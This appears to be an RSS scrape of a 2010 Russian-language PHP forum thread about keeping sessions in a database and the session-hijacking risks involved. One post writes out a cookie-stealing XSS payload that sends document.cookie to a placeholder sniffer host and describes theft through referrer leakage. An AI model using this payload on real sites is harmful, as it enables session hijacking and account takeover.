Sessions in DB - Visavi.net

Sessions in DB - Visavi.net https://visavi.net/ RSS - Visavi.net https://visavi.net/assets/img/images/logo_small.png RSS - Visavi.net https://visavi.net/ [email protected] (admin) [email protected] (admin) Wed, 15 Jan 2025 18:33:34 +0300 но если быть осторожным и не переходить на левые ссылки, то боятся нечего <img src="https://visavi.net/uploads/stickers/smile.gif" alt="smile"> https://visavi.net/topics/12592/225149 Sessions in DB delete Sun, 15 Aug 2010 13:57:34 +0400 Сообщения https://visavi.net/topics/12592/225149 в случае с перемеными, найдя хss и вставив <script>img = new Image(); img.src = "СНИФФЕР"+ document.cookie;</script> куки улеят, но не у всех браузеров это вообще реально))) а вот в твоем случае достаточно getenv("HTTP_REFERER"); а это у всех сработает, даж дыры ненужны, только перешел на страницу, и усе, доступ у хацкера есть https://visavi.net/topics/12592/225137 Sessions in DB delete Sun, 15 Aug 2010 13:52:28 +0400 Сообщения https://visavi.net/topics/12592/225137 да какая разница где ты сессию хранишь, от того что ты эти переменые не юзаеш, дополнительная уязвимость получается, что б украсть сессию надо найти пассивную xss, а уж потом попытаться снифером украсть куки, а в твоем случае надо лиш украсть страницу с куками <img src="https://visavi.net/uploads/stickers/smile.gif" alt="smile"> это легче.. такой ж косяк у почты мейла, и у форума вена вроди, у фтп некоторых))) https://visavi.net/topics/12592/225107 Sessions in DB delete Sun, 15 Aug 2010 13:40:49 +0400 Сообщения https://visavi.net/topics/12592/225107 session.save_path"" session.name"PHPSESSID" session.save_handler"files" session.auto_start"0" session.gc_probability"1" session.gc_divisor"100" Доступна с PHP 4.3.2. session.gc_maxlifetime"1440" session.serialize_handler"php" session.cookie_lifetime"0" session.cookie_path"/" session.cookie_domain"" session.cookie_secure"" session.use_cookies"1" session.use_only_cookies"0" Доступна с PHP 4.3.0. session.referer_check"" session.entropy_file"" session.entropy_length"0" session.cache_limiter"nocache" session.cache_expire"180" session.use_trans_sid"0" Доступна с PHP 4.0.3. session.bug_compat_42"1" Доступна с PHP 4.3.0. session.bug_compat_warn"1" Доступна с PHP 4.3.0. session.hash_function"0" Доступна с PHP 5.0.0. session.hash_bits_per_character"4" Доступна с PHP 5.0.0. url_rewriter.tags"a=href,area=href,frame=src,form=,fieldset=" стандартный набор, думаешь стоит тратить время на написание стольких педалей к велосипеду?)) https://visavi.net/topics/12592/225103 Sessions in DB ramzes Sun, 15 Aug 2010 13:39:24 +0400 Сообщения https://visavi.net/topics/12592/225103 велосиппедов много всяких раэных, хороших, нормальных и безобразных... https://visavi.net/topics/12592/225076 Sessions in DB Максим Sun, 15 Aug 2010 13:27:20 +0400 Сообщения https://visavi.net/topics/12592/225076 путем велосипедиста) https://visavi.net/topics/12592/225067 Sessions in DB DmitryDick Sun, 15 Aug 2010 13:24:14 +0400 Сообщения https://visavi.net/topics/12592/225067 мы пойдём другим путём... https://visavi.net/topics/12592/225054 Sessions in DB Максим Sun, 15 Aug 2010 13:18:52 +0400 Сообщения https://visavi.net/topics/12592/225054 куки и сесии ты и сам можешь удалять. родные методы быстрее, и если не ошибаюсь есть готовые решения в php для альтернативного хранения чтения и записи сессий хоть в файлы хоть в бд https://visavi.net/topics/12592/224990 Sessions in DB ramzes Sun, 15 Aug 2010 12:45:28 +0400 Сообщения https://visavi.net/topics/12592/224990 14. ramzes, мне так кажется удобней и проще у каждой сессии есть life_time - типа кукисов и тд... Мне так проще с данными работать, не знаю кому как. Решил "отречся" о с $_SESSION и $_COOKIES, которые не очистят... https://visavi.net/topics/12592/224941 Sessions in DB Максим Sun, 15 Aug 2010 12:11:07 +0400 Сообщения https://visavi.net/topics/12592/224941 автор, а зачем тебе это? большей защиты все равно не добьешься https://visavi.net/topics/12592/224933 Sessions in DB ramzes Sun, 15 Aug 2010 12:07:37 +0400 Сообщения https://visavi.net/topics/12592/224933 и к тому-же я не утверждал что это какаято особенность. и не все хранят сесси в бд. https://visavi.net/topics/12592/224923 Sessions in DB Максим Sun, 15 Aug 2010 12:03:08 +0400 Сообщения https://visavi.net/topics/12592/224923 не юзаю переменные $_SESSION. Всё хранится в бд. <pre class="prettyprint"> <?php session_name('SID'); session_start(); ?> </pre> и ишо несколько конфигов в .htaccess. окромя этого ничего не упоминается https://visavi.net/topics/12592/224918 Sessions in DB Максим Sun, 15 Aug 2010 12:01:18 +0400 Сообщения https://visavi.net/topics/12592/224918 10, ну автор вроде как утверждает что никаких сессий не юзает ($_SESSION нет ни одной!), интересно было бы послушать что он ответит)) https://visavi.net/topics/12592/224885 Sessions in DB KOZZ Sun, 15 Aug 2010 10:55:24 +0400 Сообщения https://visavi.net/topics/12592/224885 <blockquote class="blockquote">БелладонН eGo (15 Августа 2010 / 10:40) интересует вопрос из поста #6 ??</blockquote> <img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> ..просто если исходить из слов автора, это ни какая не особенность, так все хранят данные в базе <img src="https://visavi.net/uploads/stickers/smile.gif" alt="smile"> а сессион как был так и будит. https://visavi.net/topics/12592/224876 Sessions in DB delete Sun, 15 Aug 2010 10:49:38 +0400 Сообщения https://visavi.net/topics/12592/224876 интересует вопрос из поста #6 ?? https://visavi.net/topics/12592/224874 Sessions in DB KOZZ Sun, 15 Aug 2010 10:40:52 +0400 Сообщения https://visavi.net/topics/12592/224874